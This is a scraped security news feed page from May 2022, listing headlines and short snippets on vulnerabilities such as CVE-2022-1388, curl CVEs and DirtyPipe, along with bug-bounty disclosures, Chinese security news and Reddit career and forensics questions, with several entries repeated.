    I am using the reddit mobile app on android. What can my Internet provider or the owner of the WLAN I am currently connected, see? 1. The subreddits I am visiting? 2. The subreddits I am following? 3. The posts I am up/down voting and saving? 4. The posts I am making myself (like this one)? I don't know much when it's comes to networking and the technology behind it so please explain so that even a none professional like me understands this. Thank you! submitted by /u/gentleXenomorph [link] [comments]
    McAfee Endpoint Security Policies
    Hi there. Are there people here who work with McAfee ENS TP/ATP? I don't really see a workflow on how to tune ENS policies: whitelist of noise events or understand where I can turn on "Block" status of policy. I have a lot of in "Report Only" status, but this is very insecure. And it hard to understand context of events, because there can be up to 150K events per days. Basically, I'm worried about putting Block, because there can be impact for bussiness. Perhaps someone knows some resources where I can read best-practise? For example, a list of programs that can be whitelist, or which policies can be (or highly recommended to put in the status Block). submitted by /u/athanielx [link] [comments]
    Where can I post my services?
    I have been trying to get a job as security analyst, but all they require a secret clearance. Where can i post my services as Cyber Security Analyst? Basic contracts like Incident handling and forensics. submitted by /u/theRunAroundGroup [link] [comments]
    Personal favorite VPN
    Iv been shopping around an looking for a new VPN provider, curious which ones you all like an why? submitted by /u/Durza44 [link] [comments]
    Best intro cert or training?
    I'm a 15 year professional with 5-years of IT experience directly in project and program management. I'm about to take on a program role in cyber security for my company and was hoping to get feedback on crash course training or entry level certs I should be looking at to familiarize myself with the technical side. I currently hold certs with PMI and SAFe... Any recommendations or general tips? submitted by /u/aryding [link] [comments]
  • Open

    A Detailed Guide on Rubeus
    Introduction Rubeus is a C# toolkit for Kerberos interaction and abuses. Kerberos, as we all know, is a ticket-based network authentication protocol and is used The post A Detailed Guide on Rubeus appeared first on Hacking Articles.
  • Open

    A Detailed Guide on Rubeus
    Introduction Rubeus is a C# toolkit for Kerberos interaction and abuses. Kerberos, as we all know, is a ticket-based network authentication protocol and is used The post A Detailed Guide on Rubeus appeared first on Hacking Articles.
  • Open

    Remote kernel heap overflow
    PlayStation disclosed a bug submitted by m00nbsd: https://hackerone.com/reports/1350653 - Bounty: $10000
    CVE-2022-30115: HSTS bypass via trailing dot
    curl disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1557449
    CVE-2022-27780: percent-encoded path separator in URL host
    curl disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1553841
    SQL injextion via vulnerable doctrine/dbal version
    Nextcloud disclosed a bug submitted by nickvergessen: https://hackerone.com/reports/1390331
    CVE-2022-27782: TLS and SSH connection too eager reuse
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1555796
    Account takeover via Google OneTap
    Priceline disclosed a bug submitted by badca7: https://hackerone.com/reports/671406 - Bounty: $1500
    CVE-2022-27779: cookie for trailing dot TLD
    curl disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1553301
    CVE-2022-27778: curl removes wrong file on error
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1553598
    Certificate authentication re-use on redirect
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1563061
  • Open

    120k Email Credential Leaks | Plain Passwords
    It’s been a while since my last article publish here in medium. but in this article that I'm going to share with you is related to a Email… Continue reading on Medium »
    War in Ukraine / May 10
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
  • Open

    TryHackMe - Red Team OPSEC
    Hello Everyone. In this blog let’s see how to solve Red Team OPSEC room in TryHackMe. Continue reading on Techiepedia »
    The MITRE ATT&CK Framework
    In this blogpost, I’ll try my best to give you a very basic idea of what MITRE ATT&CK framework is and why it is the need of the hour in… Continue reading on Medium »
  • Open

    DigitalOcean mitigated the AMD vulnerability CVE-2021-26339
    Article URL: https://www.digitalocean.com/blog/digitalocean-mitigated-the-amd-vulnerability-cve-2021-26339 Comments URL: https://news.ycombinator.com/item?id=31342031 Points: 1 # Comments: 0
  • Open

    DigitalOcean mitigated the AMD vulnerability CVE-2021-26339
    Article URL: https://www.digitalocean.com/blog/digitalocean-mitigated-the-amd-vulnerability-cve-2021-26339 Comments URL: https://news.ycombinator.com/item?id=31342031 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-05-11 Review
    元学习——让机器学习学会学习 by ourren 企业安全建设:资产管理面面观 by ourren 新型eBPF后门boopkit的原理分析与演示 by ourren F5 BIG-IP 未授权 RCE(CVE-2022-1388)分析 by ourren Commit Level Vulnerability Dataset by ourren 卫星互联网发展与信息安全趋势 by ourren 顶会论文的经验分享与心路历程:立志勇攀高峰 坚持追求卓越 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-11 Review
    元学习——让机器学习学会学习 by ourren 企业安全建设:资产管理面面观 by ourren 新型eBPF后门boopkit的原理分析与演示 by ourren F5 BIG-IP 未授权 RCE(CVE-2022-1388)分析 by ourren Commit Level Vulnerability Dataset by ourren 卫星互联网发展与信息安全趋势 by ourren 顶会论文的经验分享与心路历程:立志勇攀高峰 坚持追求卓越 by ourren 更多最新文章,请访问SecWiki
  • Open

    JAVA代码审计之数组的基本操作(3)
    数组是一种容器,可以存储基本类型、引用类型;数据存储的类型必须一致。
    创历史记录,英国网络安全中心向社会发送3300万条警报
    近日,英国国家网络安全中心发布了一份报告,为先前注册早期预警服务的组织机构发送了3300多万条警报。
    研究人员发现一种新的网络钓鱼即服务——Frappo
    Frappo以网络钓鱼即服务的形式,使网络犯罪分子生成以假乱真的网络钓鱼页面,这些页面主要针对网络银行、电子商务和在线服务等来窃取客户数据。
    微软修复了所有Windows版本中的新NTLM零日漏洞
    微软于近期解决了一个积极利用的Windows LSA零日漏洞
    俄罗斯胜利日期间,黑客在电视节目上发布反战信息
    俄罗斯胜利日期间,境内部分电视台遭受网络攻击,黑客成功获取权限后,发布反战信息。
    Happycorp:1 Vulnhub 靶机演练
    一台vulnhub靶机,包含靶机渗透测试全过程。介绍详细具体,适合学习练习。
  • Open

    【安全通报】2022年5月微软漏洞补丁日修复多个高危漏洞
    近日,微软发布 2022年5月 安全补丁,修复了针对 36 款微软产品的 75 个漏洞 ,特别的是其中包含了 3 个 "0day" 漏洞,涉及 Windows 和 Windows 组件、Visual St...
  • Open

    【安全通报】2022年5月微软漏洞补丁日修复多个高危漏洞
    近日,微软发布 2022年5月 安全补丁,修复了针对 36 款微软产品的 75 个漏洞 ,特别的是其中包含了 3 个 "0day" 漏洞,涉及 Windows 和 Windows 组件、Visual St...
  • Open

    11 Essential Tools for Java Developers
    No content preview
    PWN101 Walkthrough | TryHackMe
    No content preview
    Cryptography essential for H4CK3R and CTF player 0x1(encoding).
    No content preview
  • Open

    11 Essential Tools for Java Developers
    No content preview
    PWN101 Walkthrough | TryHackMe
    No content preview
    Cryptography essential for H4CK3R and CTF player 0x1(encoding).
    No content preview
  • Open

    11 Essential Tools for Java Developers
    No content preview
    PWN101 Walkthrough | TryHackMe
    No content preview
    Cryptography essential for H4CK3R and CTF player 0x1(encoding).
    No content preview
  • Open

    IDOR exposes monetization status of any page’s video in Creator Studio.
    During testing I’ve found that “variables=%7B%22id%22%3A%22videoID%22%7D” parameter is vulnerable to IDOR. Vulnerability occur when… Continue reading on Medium »
    Creator Studio’s api endpoint is vulnerable to IDOR, exposes “p40_earnings_usd”:$$$
    During my testing I tried to test all query by changing PageIDs. Moreover, one of the query is vulnerable to IDOR. It was query named… Continue reading on Medium »
    Click for it
    Click to find vulnerability Continue reading on Medium »
    Improper Handling of Undefined Parameters [CWE-236] — The Hacktivists
    Improper Handling of Undefined Parameters describes a case when an application uses an undefined parameter, field, or argument. Continue reading on Medium »
    Incorrect Default Permissions [CWE-276] — The Hacktivists
    Incorrect Default Permissions weakness describes a case where software sets insecure permissions to objects on a system. Continue reading on Medium »
    Cross-Site Scripting — XSS [CWE-79] — The Hacktivists
    Cross-Site scripting or XSS is a weakness that is caused by improper neutralization of input during web page generation. Continue reading on Medium »
    Wombat’s Bug Bounty Program with Immunefi — Earn up to $500,000!
    Wombat’s goal is to deliver you the best stableswap in existence. That wouldn’t be possible without making the safety of our users’ funds… Continue reading on Wombat Exchange »
  • Open

    卷入.NET WEB
    作者:知道创宇404实验室 Longofo 时间:2022年05月11日 不久前拿到一个使用.NET目标的任务,有段时间exchange连续出了n次洞,一直想系统学下.NET相关的东西,这次遇到了,趁热补一下。能找到入门.NET WEB的并不多或者真不适合入门,还有大部分已经有经验的大佬大多直接进入反序列化或者漏洞分析阶段,好在部门有个搞过.NET的大佬@HuanGMz带了一手,相对没有...
  • Open

    卷入.NET WEB
    作者:知道创宇404实验室 Longofo 时间:2022年05月11日 不久前拿到一个使用.NET目标的任务,有段时间exchange连续出了n次洞,一直想系统学下.NET相关的东西,这次遇到了,趁热补一下。能找到入门.NET WEB的并不多或者真不适合入门,还有大部分已经有经验的大佬大多直接进入反序列化或者漏洞分析阶段,好在部门有个搞过.NET的大佬@HuanGMz带了一手,相对没有...
  • Open

    compost
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Cross-Site Scripting — XSS [CWE-79] — The Hacktivists
    Cross-Site scripting or XSS is a weakness that is caused by improper neutralization of input during web page generation. Continue reading on Medium »

  • Open

    Advice regarding career oportunities living in S.A.
    Hello everyone! I'm fairly new to the community, but I'm glad to see questions gets taken seriously here. I'm a pentester, almost 4 years of experience performing web and mobile application pentesting, but mainly focused on internal infrastructure assesments (Active Directory pentest with multiple forests, Red Team excercises, pivoting and accessing segmented networks) along with experience in Incident Response and Threat Hunting projects (basic knowledge in ELK stack, Carbon Black Response, Darktrace and basic Crowdstrike, automating tasks with Powershell/Bash) along with the capability to coordinate activities with clients and present results to both technical and executive staff. I have a bachellors degree in System's engineering (that's how the career is called here for some reason,…
    Good questions to ask the Cybersecurity Analyst I I'll replace (as someone new to Cybersecurity field)
    I have the opportunity to land a Cybersecurity Analyst I position, but don't really have much if any knowledge on the position/field(they'll train). What questions should I ask when I get to have a casual talk with the team member (non-manager) who I'd be replacing? From the little knowledge I have so far, I think I would set my long-term security goals towards Cloud Security or DevSecOps. I have some interest in Cloud(company uses AWS and a some Azure), and have no issues with doing programming/scripting, but just don't want to focus on it. From what I gathered from the job description, I'll be doing vulnerability scanning, risk/security assessments of databases/apps/servers/desktops/network devices. Monitoring SIEM, help administer endpoint protection software, work on reports and planning, etc. My questions so far include: typical day look like? how's on-call? Tools used? Do you think this job prepared you well for future jobs in cybersecurity? Pretty much looking for questions to give me an idea of what to expect, and how this will impact the rest of my career. Thank you. submitted by /u/43t20a [link] [comments]
    .shd and .spl files
    Came across these files on a print server under (c\windows\ System32\spool\PRINTERS) Can you re-print these files or view these files through a software, to see what they were? I tried copying them to another machine and see if I can reprint them from the same directory I’m trying to make a case to the admins to remove these files if they pose a security/privacy issues. submitted by /u/Yahweh03-08 [link] [comments]
    Compliance Queries
    Hey, I know that there's a big focus on SaaS companies vulnerability regarding data security. If you have any questions regarding SOC 2 and ISO 27001 compliance. I would love to answer any questions below. I've been speaking to quite a few people within this domain and there seems to be a lot of confusion regarding the subject matter. I'm happy to answer any questions that you might have. *For context purposes, I work for a start up called Scytale AI which focuses on SOC 2 compliance (this is purely for context and credibility purposes, not for promotional purposes). submitted by /u/Thecomplianceexpert [link] [comments]
    Completed my GCIH today!
    I'm very excited as this was my first SANS certification. So, curious to know, what should I do next? I'm planning on doing the Pentest+ because I received a free voucher but, SANS has so many options. I'm currently 5 years into my security career. I've done mostly SOC and SecOps work with some time in ProSevices and did the SE thing. It wasn't what I planned, exactly, but I've learned tons along the way. I'm completely open to suggestions. What else is out there, friends? submitted by /u/iam0r0r0 [link] [comments]
    Which password manager would work within a 1500ish employee company with office & Mobile workers (engineers) best?
    Hi, if hypothetically a password manager would be implemented within a business of this size and nature . Focusing on the strength of the passwords Being able to reset passwords/and or IT able to securely reset for users and handed over the password manager? As with mobile workers/engineers only have a tablet and don’t always remember their passwords set and need resetting often(how to automate it) What would it be and why? Also factoring in cost has the company may not be fully on board with shelling out too much If there’s anything I’ve missed, appreciate the questions I can answer Thanks :) submitted by /u/thelaw281 [link] [comments]
  • Open

    ETH Amsterdam — Hats hits the road
    Seven years ago, Amsterdam hosted one of the first ever international Ethereum conferences. Our OG CTO, Shay Zluf, was a keynote speaker… Continue reading on Medium »
    RCE via Dependency Confusion
    Hey there, I am Samrat Gupta aka Sm4rty, a Security Researcher and a Bug Bounty Hunter. In this Blog I will be sharing my recent finding… Continue reading on System Weakness »
    RCE via Dependency Confusion
    Hey there, I am Samrat Gupta aka Sm4rty, a Security Researcher and a Bug Bounty Hunter. In this Blog I will be sharing my recent finding… Continue reading on Medium »
    Business Logic Vulnerabilities (easy hit) Bug-Bounty
    Hello Cybersecurity Researchers, Continue reading on Medium »
    UniLend Finance moving towards Omnis Testnet with Completion of Bug Bounty
    UniLend Omnis, the upcoming new version for Lending and Borrowing of every ERC20 asset, sets another milestone and moves very close to… Continue reading on Medium »
    ResolveURI RXSS Imperva Waf Bypass
    Hi, Asslam-o-Alaikum Continue reading on Medium »
    Announcing the SynFutures V2 Testnet Bug Bounty Program
    We recently announced that our V2 testnet is now open and available for anyone to use and test! Continue reading on SynFutures »
  • Open

    Resources for important logs companies should be capturing?
    Newer to the field, and don't know much about what specific logs past the basics companies should be capturing. Logs coming form VPNs, Routers, Firewalls, Windows, etc. Logs related to AWS and Azure. Any thoughts? submitted by /u/haloman882 [link] [comments]
    Lateral movement diagrams
    How is your team displaying lateral movement for a report? Are you using Visio, Maltego, PowerPoint or something else? submitted by /u/purpleteamer24 [link] [comments]
    How do I view a file using a sleuth kit command?
    Hi everyone! Trying out sleuthkit for a school project and I'm stuck on one thing. There is questions where I am expected to for example "see the colour of an animal in a jpg file" or "tell what's spinning in a mp4 file". Tried to figure it out by myself but I have no clue anymore how to run and view a jpg or mp4 file. Could someone help me out? Thanks! submitted by /u/ahmedmourad22 [link] [comments]
    XWAYS File System image
    Hey guys, I hope everyone is well! It’s been a while. Does anyone have a a small image with XWFS/XWFS file system? Or possibly able to make one? I don’t have an xways license myself so cannot create a simple images with x ways proprietary file system. submitted by /u/SecrectSoc [link] [comments]
    Finding evidence of email tampering
    Hi folks, Sorry if this is not allowed, but I would appreciate any advice. Is there any way to determine if an outlook message has had attachments removed from it? I have a copy of the original .msg file that contains some attachments, but I need to determine if additional attachments were removed (with the remove attachments option, for example) before the file was sent to me. An examination of the header just shows: X-MS-Has-Attach: yes but doesn't indicate if any were removed, as far as I can tell. Is it possible to see in the header or other part of the file a list of the attachments, or at least the number of attachments? submitted by /u/mercsal [link] [comments]
  • Open

    Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923)
    submitted by /u/ly4k_ [link] [comments]
    Learning Linux kernel exploitation - Part 2 - CVE-2022-0847 (DirtyPipe)
    submitted by /u/0x00rick [link] [comments]
    Diving into Pre-Created computer accounts in Active Directory
    submitted by /u/oddvarmoe [link] [comments]
  • Open

    Threat Brief: CVE-2022-1388
    CVE-2022-1388 is a critical vulnerability that needs immediate attention. Learn what we've observed in the wild and strategies for mitigation. The post Threat Brief: CVE-2022-1388 appeared first on Unit42.
  • Open

    War in Ukraine / May 9
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    TryHackMe —  OhSINT Walkthrough
    Hello, we will be working on the TryHackMe box called “OhSINT”. This is labeled as an easy box and found this box to be useful, as well as… Continue reading on Medium »
    Is Google Spying on Our Gadgets? Now I’ll try to prove…
    Let’s take Russian e-mail to Yandex p12v@yandex.ru. Install it Yandex ID: 24585015. The easiest way to do this is through the bot… Continue reading on Medium »
    EZ Capture The Flag 2022 [Versi Indonesia]
    Write up yang hanya memuat penyelesaian challenge kategori OSINT pada EZ CTF 2022… Continue reading on Medium »
    Yandex Zen haters identification…
    How to identify a hater on the popular Russian site for bloggers Yandex Zen? Continue reading on Medium »
    EZ-CTF by CTF Cafe: OSINT challenges Solves and some lessons
    On May 06th the first CTF organized by CTF Cafe was held with 1,700 registered participants. Our team, the SpaceCows made 72th out of 848… Continue reading on Medium »
  • Open

    Common C Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Common C Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Common C Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    SecWiki News 2022-05-10 Review
    MYSQL8.0特性—无select注入 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-10 Review
    MYSQL8.0特性—无select注入 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    Introducing pyCobaltHound
    pyCobaltHound is an Aggressor script extension for Cobalt Strike which aims to provide a deep integration between Cobalt Strike and Bloodhound. https://blog.nviso.eu/2022/05/09/introducing-pycobalthound/ submitted by /u/A32AN [link] [comments]
    Diving into pre-created computer accounts
    submitted by /u/oddvarmoe [link] [comments]
  • Open

    Diving into pre-created computer accounts
    I was on an engagement where I simply could not elevate privileges, so I had to become creative and look deep into my old bucket (bucket being my head) of knowledge, and this resulted in some fun stuff. I had found that the client had a vulnerable certificate template also known as ESC1 that allowed... The post Diving into pre-created computer accounts appeared first on TrustedSec.
  • Open

    FreeBuf早报 | 俄阅兵日被黑客播放反战视频;黑客在微软事件日志中隐藏恶意软件
    就在俄罗斯阅兵时,电视节目表系统遭到黑客入侵,并将阅兵节目替换成反战信息,此次黑客攻击影响了几个主要的网络电视。
    F5 BIG-IP产品中关键RCE漏洞利用程序被开发
    全球网安公司Positive Technologies已经针对F5 BIG-IP产品中的CVE-2022-1388漏洞开发了利用代码。
    无线电安全攻防之GPS定位劫持
    无线电安全攻防之GPS定位劫持。
    老赵说安全系列:爬取UNICOM FocalPoint数据以及对安全编程的反思
    FocalPoint能够根据市场需求和业务目标进行产品和产品组合管理。
    小佑科技:五重风险困扰云原生安全 | 网安新势力SOLO发布季
    云原生安全的风险管理、安全架构设计的方向在哪?让小佑技术总监告诉你!
    被Conti攻击后,哥斯达黎加宣布进入紧急状态
    在多个政府机构遭到Conti勒索组织的网络攻击后,哥斯达黎加总统Rodrigo Chaves宣布全国进入紧急状态。
    CERT-UA警告恶意垃圾邮件传播Jester信息窃取程序
    乌克兰计算机应急响应小组(CERT-UA)检测到某恶意垃圾邮件活动。
    “透明部落”利用走私情报相关诱饵针对印度的攻击活动分析
    Transparent Tribe最早追溯到2012年,一直以来,这个APT组织都在对印度军方和政府人员进行持续攻击。
  • Open

    NPM Vulnerability Discussion on Twitter
    Article URL: https://www.solipsys.co.uk/Chartter/1523831884786151424.svg Comments URL: https://news.ycombinator.com/item?id=31325154 Points: 131 # Comments: 185
  • Open

    Misconfigured Rate Limit in Sending Notifications to the Victims Phone Via the Endpoint " /faxes/inbox "
    Alohi disclosed a bug submitted by shamim_12__: https://hackerone.com/reports/1482919
  • Open

    F5 BIG-IP 未授权 RCE(CVE-2022-1388)分析
    作者:知道创宇404实验室 kuipla、Billion 时间:2022年05月10日 2022/5/4日F5官方发布一个关于BIG-IP的未授权RCE(CVE-2022-1388)安全公告,官方对该漏洞的描述是Undisclosed requests may bypass iControl REST authentication.,修复方式中提到了低版本可以将非Connection:k...
    Protected Process Light (PPL) Attack
    作者:李木 原文链接:https://mp.weixin.qq.com/s/Vp0UmGuGl_O2L4blUiHhSw PP/PPL(s)背景概念 首先,PPL表示Protected Process Light,但在此之前,只有Protected Processes。受保护进程的概念是随Windows Vista / Server 2008引入的,其目的不是保护您的数据或凭据。其最初目标是...
  • Open

    F5 BIG-IP 未授权 RCE(CVE-2022-1388)分析
    作者:知道创宇404实验室 kuipla、Billion 时间:2022年05月10日 2022/5/4日F5官方发布一个关于BIG-IP的未授权RCE(CVE-2022-1388)安全公告,官方对该漏洞的描述是Undisclosed requests may bypass iControl REST authentication.,修复方式中提到了低版本可以将非Connection:k...
    Protected Process Light (PPL) Attack
    作者:李木 原文链接:https://mp.weixin.qq.com/s/Vp0UmGuGl_O2L4blUiHhSw PP/PPL(s)背景概念 首先,PPL表示Protected Process Light,但在此之前,只有Protected Processes。受保护进程的概念是随Windows Vista / Server 2008引入的,其目的不是保护您的数据或凭据。其最初目标是...
  • Open

    ResolveURI RXSS Imperva Waf Bypass
    Hi, Asslam-o-Alaikum Continue reading on System Weakness »
    ResolveURI RXSS Imperva Waf Bypass
    Hi, Asslam-o-Alaikum Continue reading on Medium »
  • Open

    Ossuaries and Catacombs
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    pictures of grease
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Any directories with First 48 episodes?
    submitted by /u/kevinc2c1 [link] [comments]
  • Open

    Start an analysis by looking for the Robots.txt
    In order for search engines such as Google, Bing, DuckDuckGo to present their results of search terms, It´s necessary that information… Continue reading on Medium »

  • Open

    Grizzly.fi Token Forcible Minting
    In early April, our whitehats izhuer and Gwinhen from Pwned No More (PNM) reported a critical bug to the bug bounty program of Grizzly.fi. Continue reading on Medium »
    Why you should never trust any website
    Hello Everyone. Today I have an interesting story about a target that I have done some pentesting on. The result will shock you Continue reading on Medium »
    The Basics of Subdomain Takeovers
    A subdomain takeover is a vulnerability which allows an attacker to take the control of a subdomain which is not owned by that attacker. Continue reading on Medium »
    Bug Bounty Career: Web Hacking
    Details Continue reading on Medium »
    The Linuxless recon for bug bounty beginners who can’t code
    When i started doing bug bounties almost 2 years ago i saw this legendary video by tomnomnom and STÖK and thought it was sheer magic. Two… Continue reading on Medium »
    AppSec Tales VI | 2FA
    Application Security Testing of the 2FA form guidelines. Continue reading on System Weakness »
  • Open

    Global default settings page is accessible to non-administrators
    Phabricator disclosed a bug submitted by dyls: https://hackerone.com/reports/1563139 - Bounty: $300
    Slowvote and Countdown can cause Denial of Service due to recursive inclusion
    Phabricator disclosed a bug submitted by dyls: https://hackerone.com/reports/1563142
  • Open

    San Diego CTF 2022 — Part Of The Ship…
    Category: OSINT  Difficulty: Easy  Challenge Author: Blarthogg  Team: OsirisProtocol (https://ctftime.org/team/151343/#.Ynh0zJJAj_s.link) Continue reading on Medium »
    War in Ukraine / May 8
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    The Cyber Institute — OSINT Challenge 3
    Hi everyone;  Here I go with a write up of my third challenge from the course OSINT Challenge developed by The Cyber Institute.   The main… Continue reading on Medium »
    War in Ukraine / May 7
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    reconDNS
    It was also developed with the aim of automating and facilitating the work of cybersecurity professionals. Continue reading on Medium »
  • Open

    Hackers are actively exploiting BIG-IP vulnerability with a 9.8 severity rating
    Article URL: https://arstechnica.com/information-technology/2022/05/hackers-are-actively-exploiting-big-ip-vulnerability-with-a-9-8-severity-rating/ Comments URL: https://news.ycombinator.com/item?id=31319852 Points: 14 # Comments: 3
  • Open

    Fuzzing Tests with Golang
    Fuzzing is a type of automated test that continuously manipulates inputs into the test program to find problems such as panics, bugs, or… Continue reading on Dev Genius »
    Fuzzing Tests with Golang
    Fuzzing is a type of automated test that continuously manipulates inputs into the test program to find problems such as panics, bugs, or… Continue reading on Medium »
    FFUF (Fuzz Faster U Fool)
    Atualmente nos CTFs e walkthroughs que estou realizando, seja no Hack The Box ou no TryHackMe, quando preciso realizar um web fuzzing… Continue reading on Medium »
  • Open

    Fuzzing Tests with Golang
    Fuzzing is a type of automated test that continuously manipulates inputs into the test program to find problems such as panics, bugs, or… Continue reading on Dev Genius »
    Fuzzing Tests with Golang
    Fuzzing is a type of automated test that continuously manipulates inputs into the test program to find problems such as panics, bugs, or… Continue reading on Medium »
    FFUF (Fuzz Faster U Fool)
    Atualmente nos CTFs e walkthroughs que estou realizando, seja no Hack The Box ou no TryHackMe, quando preciso realizar um web fuzzing… Continue reading on Medium »
  • Open

    Next steps into entering the field
    So I graduated last year with a degree in Digital Forensics and Information Assurance. A month before graduation I landed a job doing IT help desk support for my city. We do a massive range of things from running cable, to troubleshooting and resolving network issues, to other general IT stuff. I’ve even been working on getting an IR plan developed and put into place with the City I work for. It’s great experience and I’m really liking it but I do believe that I need to look into getting into my specific field within the next couple of years. My question is, will this IT job help me with finding a IR/SOC type job in the future experience wise, and what jobs should I be looking for in order to get into the field(entry level positions and such). Mainly just deciding how much time I should actually spend in this position where it won’t be a big waste of time career wise. I’m always learning new things, but I also know the job is not directly in the career path I’m pursuing. submitted by /u/brinkv [link] [comments]
    The Case of the Disappearing Scheduled Task
    Good morning, It’s time for a new 13Cubed episode! This one is based upon a Microsoft Detection and Response (DART) blog post (see Resources section). I, along with two of my colleagues (Johnathan Sykes and Meaghan Bradshaw), performed extensive research regarding two different methods by which it is possible to create "hidden" Scheduled Tasks. While one of the methods has been discussed before, this research shows how it might be leveraged by a Threat Actor. The second technique, as best we can tell, is novel. Episode: https://www.youtube.com/watch?v=xrd0w505aS8 Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]
    GCFA practice exam giveaway.. anyone
    Hi All, Just checking if any veteran can help me out with an extra GCFA practice exam give away. Recently failed it and reappearing :) submitted by /u/Mushroom-Fuzzy [link] [comments]
  • Open

    Learning Linux kernel exploitation – Part 2 – CVE-2022-0847
    Article URL: https://twitter.com/0xricksanchez/status/1523633205630619648 Comments URL: https://news.ycombinator.com/item?id=31316513 Points: 3 # Comments: 0
    F5 BIG-IP RCE exploitation (CVE-2022-1388)
    Article URL: https://packetstormsecurity.com/files/167007/F5-BIG-IP-Remote-Code-Execution.html Comments URL: https://news.ycombinator.com/item?id=31316045 Points: 2 # Comments: 0
  • Open

    Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself
    submitted by /u/SCI_Rusher [link] [comments]
    Vulnerability Analysis - CVE-2022-1388 - Randori
    submitted by /u/zxcvqwerpl [link] [comments]
    POC for CVE-2022-1388
    submitted by /u/scopedsecurity [link] [comments]
    Expanding on Existing IoCs to Leverage Immediate Threats Simulations
    submitted by /u/bayhitlaw [link] [comments]
  • Open

    Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-05-09 Review
    【D3FEND】网络安全对策知识图谱框架解读 by ourren SecWiki周刊(第427期) by ourren 从500到账户接管 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-09 Review
    【D3FEND】网络安全对策知识图谱框架解读 by ourren SecWiki周刊(第427期) by ourren 从500到账户接管 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    Windows Recon: Host Discovery
    Hello, today I will show you some of the ways in which we can perform a host discovery in windows. Continue reading on Medium »
    Red, Blue & Purple Team: Attacker, Defender & Facilitator
    Introduction:  Building an effective & secure platform is critical! In this era of rising technologies, it is becoming more and more… Continue reading on Medium »
    Malicious PDF Generator
    Generate a bunch of malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh Continue reading on Medium »
  • Open

    THM Writeup: Ra 2
    No content preview
  • Open

    THM Writeup: Ra 2
    No content preview
  • Open

    THM Writeup: Ra 2
    No content preview
  • Open

    What to do if you receive a strange email with random letters and numbers?
    I have received this morning an email coming from "Veronika Mccreadie" and the problem is: It appeared in my main page instead of spam. It has only random numbers and letters in the whole email. It has something attached. So I need to know what to do with this. I haven't even opened it just in case it can do anything hahaha yeah, I'm that paranoid. submitted by /u/chem_OS [link] [comments]
  • Open

    FreeBuf早报 | 高合汽车陷隐私泄露风波;马斯克收购推特恐面临安全调查
    据爆料,高合汽车的行车记录仪可通过车主互联功能接收其他高合汽车的信号,并读取这些汽车行车记录仪内容。
    勒索软件BlackByte出现新变种,系Go语言编写
    BlackByte 是一个功能齐备的勒索软件家族,使用多种技术进行攻击且持续升级样本,这可能会对组织数据安全构成重大威胁。
    如何解包 Python 恶意可执行文件
    打包好的 Python 程序如何获取源码,提高分析效率?
    美国宣布制裁为朝鲜黑客洗钱的 Blender
    美国财政部表示 Lazarus 通过 Blender 已经洗钱超过 2050 万美元,正式宣布制裁加密货币混合服务提供商 Blender。
    Google Play中止俄罗斯用户付费应用程序下载更新
    谷歌将禁止俄罗斯用户和开发者从 Google Play 商店下载或更新付费应用程序。
    Lazarus武器库更新:Andariel近期攻击样本分析
    Andariel 团伙主要攻击韩国的组织机构,尤其是金融机构,以获取经济利益和开展网络间谍活动。
    注意,NIST更新了网络安全供应链风险指南
    指南提供了与供应链攻击相关的趋势和最佳实践,指导企业有效管理软件供应链风险,以及在遭受供应链攻击时该如何进行应急响应。
    美国农业机械制造商AGCO遭遇勒索软件攻击
    近期AGCO宣布其公司遭受勒索软件攻击并影响了其部分生产设施。
    美国悬赏 1500 万美元寻求勒索软件团伙Conti 的关键人物信息
    为了能帮助识别和定位臭名昭著的勒索软件团伙 Conti 的主要核心人员及同谋,美国国务院开出了1500 万美元的高额赏金。
    “网安新势力”首期节目上线,Solo发布季金句连连
    北京绎云科技CEO陈坤鹏成为首位嘉宾,带来了有关实名制数据访问安全网格的分享。
  • Open

    Japanese ASMR ear licking videos and audio works.
    submitted by /u/MrRoboto12345 [link] [comments]
  • Open

    JBoss EAP/as <= 6.* RCE 及 rpc 回显
    作者:Y4er 原文链接:https://y4er.com/post/jboss-4446-rce-and-rpc-echo-response/ 看到推上发了jboss的0day rce,分析一下。 前言 这个洞是在国外Alligator Conference 2019会议上的一个议题,ppt在这里 https://s3.amazonaws.com/files.joaomatosf.com...
  • Open

    JBoss EAP/as <= 6.* RCE 及 rpc 回显
    作者:Y4er 原文链接:https://y4er.com/post/jboss-4446-rce-and-rpc-echo-response/ 看到推上发了jboss的0day rce,分析一下。 前言 这个洞是在国外Alligator Conference 2019会议上的一个议题,ppt在这里 https://s3.amazonaws.com/files.joaomatosf.com...
  • Open

    Fuzzing
